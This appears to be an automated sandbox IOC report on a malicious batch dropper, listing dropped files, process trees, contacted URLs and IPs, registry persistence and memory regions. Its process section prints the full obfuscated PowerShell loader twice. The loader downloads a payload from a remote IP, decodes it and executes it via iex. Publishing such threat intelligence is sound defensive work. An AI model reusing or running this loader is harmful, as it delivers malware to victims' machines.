IOC Report
Doc_004024024001.bat

loading gif

Files

File Path
Type
Category
Malicious
Doc_004024024001.bat
ASCII text, with very long lines (3300), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bc32zhws.imz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fy3mpi5u.ni3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocinpzcp.ykt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkjrsfcx.y4n.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s5497I81
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5XGY2TGM0TXXOAVV8K1P.temp
data
dropped
C:\Users\user\AppData\Roaming\Stregmaalene.Dis
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Doc_004024024001.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Slvtjsskabets3 = 1;$Adoptionsbevillingers='S';$Adoptionsbevillingers+='ubstrin';$Adoptionsbevillingers+='g';Function Takilman203($Prefade){$Unconversable=$Prefade.Length-$Slvtjsskabets3;For($Magnetometrical=1; $Magnetometrical -lt $Unconversable; $Magnetometrical+=(2)){$Cardsharping+=$Prefade.$Adoptionsbevillingers.Invoke($Magnetometrical, $Slvtjsskabets3);}$Cardsharping;}function Roebling($Unmotivatedly){& ($Opmuntringernes) ($Unmotivatedly);}$Glatslebnes=Takilman203 ' M o,zHiSl l,a /F5m.B0G (GWTiInId,o w.sM NfT, 1S0C.,0G;P HWSi,n,6V4 ; Px 6V4S;S .rVvB:L1D2C1N.U0 ). G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWfCoFx./,1,2R1 . 0A ';$Butikshandlerne=Takilman203 ' U,s e.r - A gUeMnKt ';$Winterfeeding=Takilman203 ',h.tLt,pT:C/,/S8F7 . 1 2 1D..1 0N5N.B1 6A3S/SPSu nDkDt e,t..,hShIp. ';$Lessoning=Takilman203 '.>S ';$Opmuntringernes=Takilman203 'Ki e xP ';$Farvefabrikkerne='Overbrained';Roebling (Takilman203 'bS,eitH-SC o n.t e n.t K-DPUa,tNh, TT,: \.C.hoi s e lAi n.g sI.Gt xDt - V aOlFuSei $,FUa r v eDfFaIbjrDiDk.k.e rLn eT;S ');Roebling (Takilman203 '.i,f. T(,tSe sctu-kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP..tWxStK) {EeUx i t } ;W ');$Electriceel = Takilman203 ' eEcPhOoV %,anp,pRd aGtHar% \BS t rKeCg mGa.aUlRe nRe .GDUiTsr &S&k Ae c,h.o. v$ ';Roebling (Takilman203 ',$ g lroBb aSlK: R uHbHiMcGoWn = (.cTmSdR A/ScD $IERl e,cet,r iPc.e e lF)V ');Roebling (Takilman203 ' $,gEl oAb aUlH:KGGaIrAa n.tAsT=.$AW i n.tSeErFfRe eAd,iTn g..OsHp l,i tB(S$ L ePsUsSo.nSi nDgU)N ');$Winterfeeding=$Garants[0];Roebling (Takilman203 ' $Bg l oFbsaFl :DFAiFn,gAe r vPaHnCtPeRn.= N,eIwe- OKbMjMeCc.t BSMy s.tGePmH.,NueAt,. W.eLb.C.lBiCe,nCtB ');Roebling (Takilman203 'G$NF.i nPgHe rUv aTnstNeWn . HPe a dKe rus [ $EBSu tRiDkSsAhSa n dLl,errRn e ]R=I$TG l a.t s l eSb nMe,si ');$Formatlinietegnets=Takilman203 ' FMi,nFgLe rSv a nBt.eunC.HDFoNw n lSoFaMdWFBi.lTeP(.$AWFiMnOt,eHrEfWeFe dii n,gP,E$FDPuKblbFiKnA)P ';$Formatlinietegnets=$Rubicon[1]+$Formatlinietegnets;$Dubbin=$Rubicon[0];Roebling (Takilman203 'M$ g l,oKb,aVls:,BUeSgMy.nDdPe rGk,o.nMs,t,r,uMkRt iCo n 4 1U=I(.T.e,sHtO-APPa tFhS .$BDvu.bAb.i nI) ');while (!$Begynderkonstruktion41) {Roebling (Takilman203 ',$ gSl oBb aClP:.m aTr.iJn e s,tpa toiFoFnRe rPn.e s =B$ftJr uFe ') ;Roebling $Formatlinietegnets;Roebling (Takilman203 'US.tLaSr tF- SMlBe.e,p K4D ');Roebling (Takilman203 'Y$,g lMobb a,lF: BFe g yTnKd.e rBkPo,nvsSt.rGutk.t,i,o.n 4B1,=I( T e s tA-.PSaSt,hM S$ DLuBbMb i n )I ') ;Roebling (Takilman203 ',$HgUlCo.b,a lT: CIaHr eReMnF= $MgflboAbNaOls:bt.iUl r.e.gPnLeRt,+f+B%s$SG.aDrSa nPt sB. c oIu,nDt ') ;$Winterfeeding=$Garants[$Careen];}Roebling (Takilman203 ' $,gClBo,bSaMl,:BATkHt iLoUn sDe.nShGe dke.nNs, G=s GCeUtG-SCdo n tSe,n tS $GD,u.b b,i nS ');Roebling (Takilman203 'F$AgMlMo b a.l : HSeSaUd m,e n. ,= [ S,y.sNt eEmT.,C osnNv eHrHt ] :,:,FUr o muB aSsEe 6,4GS t,r.itnfgU( $,AEkst i oAn,s,eBn,h e dUe nBs )U ');Roebling (Takilman203 'B$Kg lRo,b,aPlM:KLPn.n i nMgBs.d.a gLe,n. R=, ,[,SRy.s t,e,mS.DTCe xDtO. EMn csofd.i,nSg ] : : A S C IPI .MG e.tRS.t.r,i n gD( $SHBeJa d.mLeEn ) ');Roebling (Takilman203 'S$.g l o,bPaRl :SR e n u.mCm e,rKeSrKePdceBsB= $sLBn,n,ipnag s d aDg eBn..,s u b s,tTrPi nPg (G2.7,5.3P9 0N,H2 6 5 4 1 )V ');Roebling $Renummereredes;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stregmaalene.Dis && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Slvtjsskabets3 = 1;$Adoptionsbevillingers='S';$Adoptionsbevillingers+='ubstrin';$Adoptionsbevillingers+='g';Function Takilman203($Prefade){$Unconversable=$Prefade.Length-$Slvtjsskabets3;For($Magnetometrical=1; $Magnetometrical -lt $Unconversable; $Magnetometrical+=(2)){$Cardsharping+=$Prefade.$Adoptionsbevillingers.Invoke($Magnetometrical, $Slvtjsskabets3);}$Cardsharping;}function Roebling($Unmotivatedly){& ($Opmuntringernes) ($Unmotivatedly);}$Glatslebnes=Takilman203 ' M o,zHiSl l,a /F5m.B0G (GWTiInId,o w.sM NfT, 1S0C.,0G;P HWSi,n,6V4 ; Px 6V4S;S .rVvB:L1D2C1N.U0 ). G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWfCoFx./,1,2R1 . 0A ';$Butikshandlerne=Takilman203 ' U,s e.r - A gUeMnKt ';$Winterfeeding=Takilman203 ',h.tLt,pT:C/,/S8F7 . 1 2 1D..1 0N5N.B1 6A3S/SPSu nDkDt e,t..,hShIp. ';$Lessoning=Takilman203 '.>S ';$Opmuntringernes=Takilman203 'Ki e xP ';$Farvefabrikkerne='Overbrained';Roebling (Takilman203 'bS,eitH-SC o n.t e n.t K-DPUa,tNh, TT,: \.C.hoi s e lAi n.g sI.Gt xDt - V aOlFuSei $,FUa r v eDfFaIbjrDiDk.k.e rLn eT;S ');Roebling (Takilman203 '.i,f. T(,tSe sctu-kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP..tWxStK) {EeUx i t } ;W ');$Electriceel = Takilman203 ' eEcPhOoV %,anp,pRd aGtHar% \BS t rKeCg mGa.aUlRe nRe .GDUiTsr &S&k Ae c,h.o. v$ ';Roebling (Takilman203 ',$ g lroBb aSlK: R uHbHiMcGoWn = (.cTmSdR A/ScD $IERl e,cet,r iPc.e e lF)V ');Roebling (Takilman203 ' $,gEl oAb aUlH:KGGaIrAa n.tAsT=.$AW i n.tSeErFfRe eAd,iTn g..OsHp l,i tB(S$ L ePsUsSo.nSi nDgU)N ');$Winterfeeding=$Garants[0];Roebling (Takilman203 ' $Bg l oFbsaFl :DFAiFn,gAe r vPaHnCtPeRn.= N,eIwe- OKbMjMeCc.t BSMy s.tGePmH.,NueAt,. W.eLb.C.lBiCe,nCtB ');Roebling (Takilman203 'G$NF.i nPgHe rUv aTnstNeWn . HPe a dKe rus [ $EBSu tRiDkSsAhSa n dLl,errRn e ]R=I$TG l a.t s l eSb nMe,si ');$Formatlinietegnets=Takilman203 ' FMi,nFgLe rSv a nBt.eunC.HDFoNw n lSoFaMdWFBi.lTeP(.$AWFiMnOt,eHrEfWeFe dii n,gP,E$FDPuKblbFiKnA)P ';$Formatlinietegnets=$Rubicon[1]+$Formatlinietegnets;$Dubbin=$Rubicon[0];Roebling (Takilman203 'M$ g l,oKb,aVls:,BUeSgMy.nDdPe rGk,o.nMs,t,r,uMkRt iCo n 4 1U=I(.T.e,sHtO-APPa tFhS .$BDvu.bAb.i nI) ');while (!$Begynderkonstruktion41) {Roebling (Takilman203 ',$ gSl oBb aClP:.m aTr.iJn e s,tpa toiFoFnRe rPn.e s =B$ftJr uFe ') ;Roebling $Formatlinietegnets;Roebling (Takilman203 'US.tLaSr tF- SMlBe.e,p K4D ');Roebling (Takilman203 'Y$,g lMobb a,lF: BFe g yTnKd.e rBkPo,nvsSt.rGutk.t,i,o.n 4B1,=I( T e s tA-.PSaSt,hM S$ DLuBbMb i n )I ') ;Roebling (Takilman203 ',$HgUlCo.b,a lT: CIaHr eReMnF= $MgflboAbNaOls:bt.iUl r.e.gPnLeRt,+f+B%s$SG.aDrSa nPt sB. c oIu,nDt ') ;$Winterfeeding=$Garants[$Careen];}Roebling (Takilman203 ' $,gClBo,bSaMl,:BATkHt iLoUn sDe.nShGe dke.nNs, G=s GCeUtG-SCdo n tSe,n tS $GD,u.b b,i nS ');Roebling (Takilman203 'F$AgMlMo b a.l : HSeSaUd m,e n. ,= [ S,y.sNt eEmT.,C osnNv eHrHt ] :,:,FUr o muB aSsEe 6,4GS t,r.itnfgU( $,AEkst i oAn,s,eBn,h e dUe nBs )U ');Roebling (Takilman203 'B$Kg lRo,b,aPlM:KLPn.n i nMgBs.d.a gLe,n. R=, ,[,SRy.s t,e,mS.DTCe xDtO. EMn csofd.i,nSg ] : : A S C IPI .MG e.tRS.t.r,i n gD( $SHBeJa d.mLeEn ) ');Roebling (Takilman203 'S$.g l o,bPaRl :SR e n u.mCm e,rKeSrKePdceBsB= $sLBn,n,ipnag s d aDg eBn..,s u b s,tTrPi nPg (G2.7,5.3P9 0N,H2 6 5 4 1 )V ');Roebling $Renummereredes;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe
"C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe"
malicious
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\SysWOW64\AtBroker.exe"
malicious
C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe
"C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stregmaalene.Dis && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.microsoft.coe
unknown
http://nuget.org/NuGet.exe
unknown
http://87.121.105.163/Punktet.hhpP
unknown
http://87.121.H:
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
https://aka.ms/pscore68
unknown
http://87.121.105.163/Punktet.hhp
87.121.105.163
http://87.121.105.163/Punktet.hhpXR
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://87.121.105.163/TjtonPwEiP175.bin
87.121.105.163
https://github.com/Pester/Pester
unknown
There are 9 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.megabet303.lol
unknown
malicious
www.oyoing.com
127.0.0.1
www.tyaer.com
47.91.88.207
www.theplays.shop
172.67.152.117

IPs

IP
Domain
Country
Malicious
87.121.105.163
unknown
Bulgaria
127.0.0.1
www.oyoing.com
unknown
47.91.88.207
www.tyaer.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
PX5H4
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 12 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2D10000
unclassified section
page execute and read and write
malicious
570000
system
page execute and read and write
malicious
5BA2000
trusted library allocation
page read and write
malicious
252F0000
unclassified section
page execute and read and write
malicious
3C00000
unkown
page execute and read and write
malicious
A10000
trusted library allocation
page read and write
malicious
4F70000
system
page execute and read and write
malicious
8830000
direct allocation
page execute and read and write
malicious
1C0B94F1000
trusted library allocation
page read and write
malicious
9228000
direct allocation
page execute and read and write
malicious
A50000
trusted library allocation
page read and write
malicious
2DC0000
trusted library section
page read and write
1C0C18AC000
heap
page read and write
1C0C164C000
heap
page read and write
7840000
trusted library allocation
page read and write
30C3000
heap
page read and write
561000
unkown
page execute read
F0229CD000
stack
page read and write
2B01000
heap
page read and write
BA74FFE000
stack
page read and write
18843FA5000
trusted library allocation
page read and write
AB1000
unkown
page readonly
77C0000
trusted library allocation
page read and write
8663000
heap
page read and write
2CFD000
stack
page read and write
BA7553E000
unkown
page read and write
6DAE000
stack
page read and write
2B01000
heap
page read and write
1C0AB2B8000
trusted library allocation
page read and write
1C0C1667000
heap
page read and write
8250000
trusted library allocation
page read and write
D828000
direct allocation
page execute and read and write
1C0A9CC5000
trusted library allocation
page read and write
575000
unkown
page read and write
2B05000
heap
page read and write
2B01000
heap
page read and write
1C0A950B000
trusted library allocation
page read and write
7FE0000
heap
page read and write
C0D000
heap
page read and write
4E1F000
stack
page read and write
2367E000
stack
page read and write
2D10000
direct allocation
page read and write
774D000
stack
page read and write
800000
unkown
page readonly
30AE000
heap
page read and write
6F30000
direct allocation
page read and write
2B01000
heap
page read and write
188422D0000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
7A6F000
heap
page read and write
1C0A9E50000
trusted library allocation
page read and write
564C000
stack
page read and write
63D8000
remote allocation
page execute and read and write
188421B0000
heap
page read and write
577000
unkown
page readonly
77D0000
trusted library allocation
page read and write
7F1E000
stack
page read and write
6E2E000
stack
page read and write
7F60000
heap
page read and write
235CE000
stack
page read and write
BD7000
heap
page read and write
1C0B94A1000
trusted library allocation
page read and write
18843E03000
trusted library allocation
page read and write
4604000
heap
page read and write
8220000
direct allocation
page read and write
1C0AA863000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
2C40000
heap
page read and write
BA754FC000
stack
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
8810000
trusted library allocation
page read and write
1884230D000
heap
page read and write
1C0C16B0000
heap
page read and write
56E000
unkown
page readonly
2B01000
heap
page read and write
BE0000
heap
page read and write
23EF0000
unclassified section
page execute and read and write
8217000
stack
page read and write
1C0C1684000
heap
page read and write
5A0000
unkown
page readonly
4C62000
unclassified section
page read and write
7FD3000
heap
page read and write
455E000
unkown
page execute and read and write
2B01000
heap
page read and write
55CF000
stack
page read and write
AC0000
unkown
page read and write
70FD000
stack
page read and write
2B01000
heap
page read and write
2710000
unkown
page readonly
2873000
unkown
page read and write
944000
heap
page read and write
2770000
unkown
page readonly
560000
unkown
page readonly
1C0C181F000
heap
page read and write
2B01000
heap
page read and write
944000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2DB7000
heap
page read and write
2AAA000
heap
page read and write
2B01000
heap
page read and write
6F20000
direct allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
4792000
trusted library allocation
page read and write
2B01000
heap
page read and write
4780000
trusted library allocation
page read and write
2B01000
heap
page read and write
482E000
stack
page read and write
1C0B977A000
trusted library allocation
page read and write
7485000
heap
page read and write
2B01000
heap
page read and write
4790000
trusted library allocation
page read and write
2C7E000
stack
page read and write
2B01000
heap
page read and write
1C0C17A3000
heap
page read and write
944000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
BA28000
direct allocation
page execute and read and write
31D8000
remote allocation
page execute and read and write
2C48000
heap
page read and write
2B01000
heap
page read and write
81E0000
direct allocation
page read and write
2B01000
heap
page read and write
2660000
heap
page read and write
45D8000
remote allocation
page execute and read and write
B40000
unkown
page readonly
30B6000
heap
page read and write
9A0000
unkown
page readonly
7FFD9B783000
trusted library allocation
page execute and read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
950000
unkown
page readonly
2B01000
heap
page read and write
25C4E000
unclassified section
page execute and read and write
2BABAE40000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
56E000
unkown
page readonly
303E000
stack
page read and write
2B01000
heap
page read and write
74AE000
heap
page read and write
7FD7000
heap
page read and write
2B01000
heap
page read and write
6FFA000
stack
page read and write
23CC9000
direct allocation
page execute and read and write
2354E000
stack
page read and write
2B01000
heap
page read and write
73C7000
trusted library allocation
page read and write
2B01000
heap
page read and write
7A81000
heap
page read and write
1C0C1797000
heap
page execute and read and write
F022CFF000
unkown
page read and write
27EE000
stack
page read and write
74A5000
heap
page read and write
7A75000
heap
page read and write
561000
unkown
page execute read
5E0000
unkown
page readonly
1C0A9E42000
trusted library allocation
page read and write
2B01000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
4B1D000
direct allocation
page execute and read and write
2B01000
heap
page read and write
79F9000
heap
page read and write
2B20000
heap
page read and write
9D0000
heap
page read and write
2B01000
heap
page read and write
1C0C15D6000
heap
page read and write
8440000
trusted library allocation
page execute and read and write
8415000
trusted library allocation
page read and write
82BE000
stack
page read and write
2BABB014000
heap
page read and write
2B01000
heap
page read and write
85F0000
heap
page read and write
4770000
trusted library allocation
page read and write
23B90000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
46BE000
stack
page read and write
7FFD9B782000
trusted library allocation
page read and write
1C0A75E5000
heap
page read and write
7627000
trusted library allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
4CBC000
unclassified section
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
1C0C1790000
heap
page execute and read and write
1C0C1690000
heap
page read and write
81AF000
stack
page read and write
2D10000
direct allocation
page read and write
3120000
trusted library section
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
2B01000
heap
page read and write
2350F000
stack
page read and write
AF0000
heap
page read and write
1C0AB31E000
trusted library allocation
page read and write
AF5000
heap
page read and write
2B01000
heap
page read and write
8860000
direct allocation
page read and write
1C0A96AA000
trusted library allocation
page read and write
8250000
direct allocation
page read and write
27A0000
heap
page read and write
6F70000
direct allocation
page read and write
4F89000
trusted library allocation
page read and write
595E000
unkown
page execute and read and write
4900000
heap
page read and write
18843E10000
trusted library allocation
page read and write
2B00000
heap
page read and write
BA7537D000
stack
page read and write
4FC0000
heap
page read and write
5959000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
2D19000
heap
page read and write
1884211C000
system
page execute and read and write
970000
unkown
page readonly
2B01000
heap
page read and write
2B01000
heap
page read and write
4C80000
heap
page read and write
7A98000
heap
page read and write
2B01000
heap
page read and write
2734000
system
page read and write
7A41000
heap
page read and write
2B01000
heap
page read and write
9C28000
direct allocation
page execute and read and write
4FFF000
system
page execute and read and write
98E000
stack
page read and write
291D000
stack
page read and write
2B01000
heap
page read and write
B11000
unkown
page readonly
3175000
heap
page read and write
2B01000
heap
page read and write
7F70000
heap
page read and write
4B92000
direct allocation
page execute and read and write
7AA5000
heap
page read and write
2B01000
heap
page read and write
276C000
stack
page read and write
BA4000
heap
page read and write
BA7583E000
stack
page read and write
4F1A000
stack
page read and write
74E1000
heap
page read and write
2F2D000
stack
page read and write
AB1000
unkown
page readonly
2B01000
heap
page read and write
2B01000
heap
page read and write
7AE0000
trusted library allocation
page read and write
2B01000
heap
page read and write
2BABAC6B000
heap
page read and write
2760000
heap
page read and write
4A49000
trusted library allocation
page read and write
7A25000
heap
page read and write
8631000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
1C0C1628000
heap
page read and write
BB0000
unkown
page read and write
6EFB000
stack
page read and write
8820000
trusted library allocation
page read and write
548000
stack
page read and write
2B01000
heap
page read and write
7EE90000
trusted library allocation
page execute and read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2990000
heap
page read and write
AA0000
unkown
page read and write
A0E000
stack
page read and write
7A04000
heap
page read and write
2B01000
heap
page read and write
1C0AAF53000
trusted library allocation
page read and write
53EE000
stack
page read and write
560B000
stack
page read and write
4868000
trusted library allocation
page read and write
940000
heap
page read and write
32EF000
stack
page read and write
3170000
heap
page read and write
5F0000
heap
page read and write
2C57000
heap
page read and write
2B01000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
2DFE000
stack
page read and write
472C000
stack
page read and write
2BABAD60000
heap
page read and write
B60000
unkown
page read and write
9C0000
unkown
page readonly
75D0000
trusted library allocation
page read and write
48E0000
heap
page read and write
49EE000
direct allocation
page execute and read and write
5B0000
unkown
page readonly
7FFD9B7DC000
trusted library allocation
page execute and read and write
2C59000
heap
page read and write
AEE000
stack
page read and write
788B000
stack
page read and write
2B01000
heap
page read and write
980000
heap
page read and write
2B01000
heap
page read and write
6DEE000
stack
page read and write
1C0A9D7F000
trusted library allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
8095000
heap
page read and write
5E0000
unkown
page readonly
8611000
heap
page read and write
944000
heap
page read and write
1C0C1673000
heap
page read and write
2B01000
heap
page read and write
96C000
stack
page read and write
2B01000
heap
page read and write
5901000
trusted library allocation
page read and write
1C0A9AA0000
trusted library allocation
page read and write
263E000
stack
page read and write
23840000
heap
page read and write
1C0A9D43000
trusted library allocation
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
1C0A8EF0000
trusted library allocation
page read and write
2B01000
heap
page read and write
7A62000
heap
page read and write
8639000
heap
page read and write
7FAD000
stack
page read and write
1C0AB4D8000
trusted library allocation
page read and write
1C0A74C3000
heap
page read and write
3159000
heap
page read and write
507C000
system
page execute and read and write
7A5B000
heap
page read and write
944000
heap
page read and write
2660000
heap
page read and write
2B01000
heap
page read and write
13EFE340000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
4EDB000
stack
page read and write
497D000
direct allocation
page execute and read and write
2B01000
heap
page read and write
2862000
unkown
page read and write
83A000
stack
page read and write
2B01000
heap
page read and write
590000
unkown
page readonly
2CD0000
direct allocation
page read and write
50B000
stack
page read and write
2A78000
heap
page read and write
7FB2000
heap
page read and write
BA752FE000
stack
page read and write
82D0000
heap
page read and write
90E000
stack
page read and write
47EB000
stack
page read and write
CE28000
direct allocation
page execute and read and write
2B3C000
unkown
page read and write
4FD8000
remote allocation
page execute and read and write
96C000
stack
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
9CE000
stack
page read and write
23840000
heap
page read and write
7760000
trusted library allocation
page read and write
7FE6000
heap
page read and write
7FE1000
heap
page read and write
2360E000
stack
page read and write
2B01000
heap
page read and write
7FDB000
heap
page read and write
446EBFC000
stack
page read and write
DD0000
unkown
page readonly
4E2F000
stack
page read and write
9C0000
unkown
page readonly
1C0AB31B000
trusted library allocation
page read and write
2B01000
heap
page read and write
29E0000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
18843FC4000
trusted library allocation
page read and write
2B01000
heap
page read and write
560E000
stack
page read and write
23B1B000
heap
page read and write
4795000
trusted library allocation
page execute and read and write
2ABC000
heap
page read and write
2B3C000
unkown
page read and write
2CFF000
heap
page read and write
7FFD9B931000
trusted library allocation
page read and write
7FD7000
heap
page read and write
3150000
heap
page read and write
85EC000
stack
page read and write
73C0000
trusted library allocation
page read and write
13EFE498000
heap
page read and write
2A70000
heap
page read and write
7FE7000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
1C0C15CF000
heap
page read and write
9D0000
heap
page read and write
2F24000
unkown
page read and write
2B01000
heap
page read and write
561000
unkown
page execute read
1C0AAF4D000
trusted library allocation
page read and write
81C0000
direct allocation
page read and write
79F4000
heap
page read and write
83A000
stack
page read and write
3190000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2AC6000
heap
page read and write
54AE000
stack
page read and write
2CE6000
heap
page read and write
4E60000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
4DDE000
stack
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1C0C1590000
heap
page read and write
2B01000
heap
page read and write
4C7F000
stack
page read and write
7FFA000
heap
page read and write
7A6D000
heap
page read and write
48FE000
stack
page read and write
1C0C17C4000
heap
page read and write
2358E000
stack
page read and write
8625000
heap
page read and write
4F9E000
stack
page read and write
3039000
stack
page read and write
18843FCE000
trusted library allocation
page read and write
B00000
unkown
page read and write
47AA000
stack
page read and write
